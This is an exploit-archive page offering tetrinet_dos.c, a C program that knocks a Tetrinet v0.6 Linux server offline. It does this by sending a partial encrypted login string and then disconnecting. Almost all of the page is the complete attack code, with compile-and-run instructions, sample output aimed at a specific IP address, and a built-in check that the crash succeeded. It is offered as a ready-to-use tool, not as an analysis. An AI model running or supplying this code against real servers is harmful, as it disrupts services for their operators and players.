exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

tetrinet_dos.c

tetrinet_dos.c
Posted Jul 12, 2000
Authored by vade79, realhalo | Site realhalo.org

Tetrinet v0.6 for linux denial of service exploit. If a user on the local network sends an encrypted string and disconnects before the login is completed, the Tetrinet server exits with a broken pipe.

tags | exploit, denial of service, local
systems | linux
SHA-256 | eade1092a1446a89cdd3abe32e722299cf310cac965b8038dcba3b09b7b7ca8f

tetrinet_dos.c

Change Mirror Download
/* (linux)tetrinet[v0.6(current)] "break the pipe" dos, by v9[v9@fakehalo.org].
the error occurs when a person on the same network as a person running a
tetrinet server sends a string(encrypted) and disconnects before it is
completed(login). this makes the tetrinet server exit with a broken pipe.

note: this was made for linux, mainly as a concept -- if you find anything
else about it, mail me. try using netris(it's for real men :P).

you do this:
bash# cc tetrinet_dos.c -o tetrinet_dos
bash# ./tetrinet_dos 209.215.8.28 31457 (127.0.0.1 would work too)
*** tetrinet(linux)v0.6: remote/local denial of service.
*** target : 209.215.8.28:31457.
*** crash data : 00469B28AA2D923692C30FB1E168ED63FD2E67A5EF11.
[ connecting -> connected -> sending crash -> checking -> exploit success. ]
bash#

running server does this:
bash# tetrinet-server
Broken pipe
bash#
*/

#define DEFAULT_PORT 31457 // default port. (tetrinet's default)
#define TIMEOUT 5 // time amount before giving up.
#define ENCRYPT "tetrisstart null 1.13" // incomplete data. (shouldn't change)
#include <stdio.h>
#include <signal.h>
#include <netinet/in.h>
void timeout(){printf("timeout(%d)! ]\n",TIMEOUT);exit(-1);}
int main(int argc,char **argv){
char target[256],buf[1024],crash[1024],hash[32];
int sock,port,len,i,a,b,c,d,tmp;
struct sockaddr_in s;
if(argc<2){printf("*** syntax: %s <ip> [port]\n",argv[0]);exit(-1);}
else{strncpy(target,argv[1],256);}
if(argc>2){port=atoi(argv[2]);}
else{port=DEFAULT_PORT;}
strncpy(crash,ENCRYPT,1024);
if(tmp=strtok(argv[1],".")){a=atoi(tmp);}
if(tmp=strtok(0,".")){b=atoi(tmp);}
if(tmp=strtok(0,".")){c=atoi(tmp);}
if(tmp=strtok(0,".")){d=atoi(tmp);}
sprintf(hash,"%d",a*54+b*41+c*29+d*17);len=strlen(crash);
for(i=0;i<len;i++){buf[i+1]=(((buf[i]&0xFF)+(crash[i]&0xFF))%255)^hash[i%strlen(hash)];}
len++;for(i=0;i<len;i++){sprintf(crash+i*2,"%02X",buf[i]&0xFF);}
s.sin_addr.s_addr=inet_addr(target);
s.sin_family=AF_INET;
s.sin_port=htons(port);
sock=socket(AF_INET,SOCK_STREAM,0);
printf("*** tetrinet(linux)v0.6: (remote+local) denial of service.\n");
printf("*** target : %s:%d.\n",target,port);
printf("*** crash data : %s.\n",crash);
fprintf(stderr,"[ connecting -> ",target,port);
signal(SIGALRM, timeout);alarm(TIMEOUT);
if(connect(sock,(struct sockaddr_in*)&s,sizeof(s))){fprintf(stderr,"connection failed. ]\n");exit(-1);}
else{fprintf(stderr,"connected -> ");}
alarm(0);
fprintf(stderr,"sending crash -> ");
write(sock,crash,strlen(crash));
close(sock);
sleep(1);
fprintf(stderr,"checking -> ");
alarm(TIMEOUT);
sock=socket(AF_INET,SOCK_STREAM,0);
if(connect(sock,(struct sockaddr_in*)&s,sizeof(s))){fprintf(stderr,"exploit success. ]\n");exit(0);}
else{fprintf(stderr,"exploit failed. ]\n");}
close(sock);
exit(0);
}
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close